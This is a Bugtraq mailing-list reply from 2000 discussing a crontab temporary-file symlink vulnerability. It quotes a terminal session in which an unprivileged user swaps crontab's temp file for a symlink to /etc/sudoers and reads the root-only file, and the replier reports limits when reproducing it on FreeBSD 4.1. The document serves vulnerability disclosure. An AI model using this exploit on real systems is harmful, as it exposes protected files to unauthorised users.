|
Bugtraq
mailing list archives
Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability
From: Andrey Alekseyev <uitm () ZENON NET>
Date: Wed, 25 Oct 2000 16:07:23 +0400
Well, performing a quick test I was unable to reproduce
example below with crontab that comes with FreeBSD 4.1-RELEASE.
I was only able to install files containing more than 3
characters in a line and only if these were digits.
Otherwise crontab complains about line format.
I was also able to successfully install a file with all
lines commented out with '#' (local /etc/inetd.conf).
Of course, it's possible to import /etc/crontab mode 0600.
Hi,
Tested on
4.0-RELEASE FreeBSD 4.0-RELEASE #9
4.1-RELEASE FreeBSD 4.1-RELEASE #1:
Can read any file wich start with comment simbol (#)
$ ls -l /etc/sudoers
-r-------- 1 root wheel 313 24 oct 20:20 /etc/sudoers
$ id
uid=1002(alf) gid=1002(alf) groups=1002(alf)
$ crontab -e
~
~
~
/tmp/crontab.hLmjTbK417
:!sh
[ #### Make simbolik link]
rm /tmp/crontab.hLmjTbK417
ln -sf /etc/sudoers /tmp/crontab.hLmjTbK417
exit
[ #### quit vi ]
/tmp/crontab.hLmjTbK417
crontab: installing new crontab
[ #### start crontab editor]
$ crontab -e
[####### See in vi]
# sudoers file.
#
# This file MUST be edited with the 'visudo' command as root.
#
# See the sudoers man page for the details on how to write a sudoers
file.
#
# Host alias specification
# User alias specification
# Cmnd alias specification
# User privilege specification
root ALL=(ALL) ALL
alf ALL=(ALL) ALL
~
~
~
If file started with no # then crontab sad
"/tmp/crontab.GAeNMP1357":2: bad minute
crontab: errors in crontab file, can't install
--
------
Alf Delems<alf () isd memonet ru>
--
Andrey Alekseyev. Zenon N.S.P.
 By Date 
By Thread
Current thread:
| 
Intro
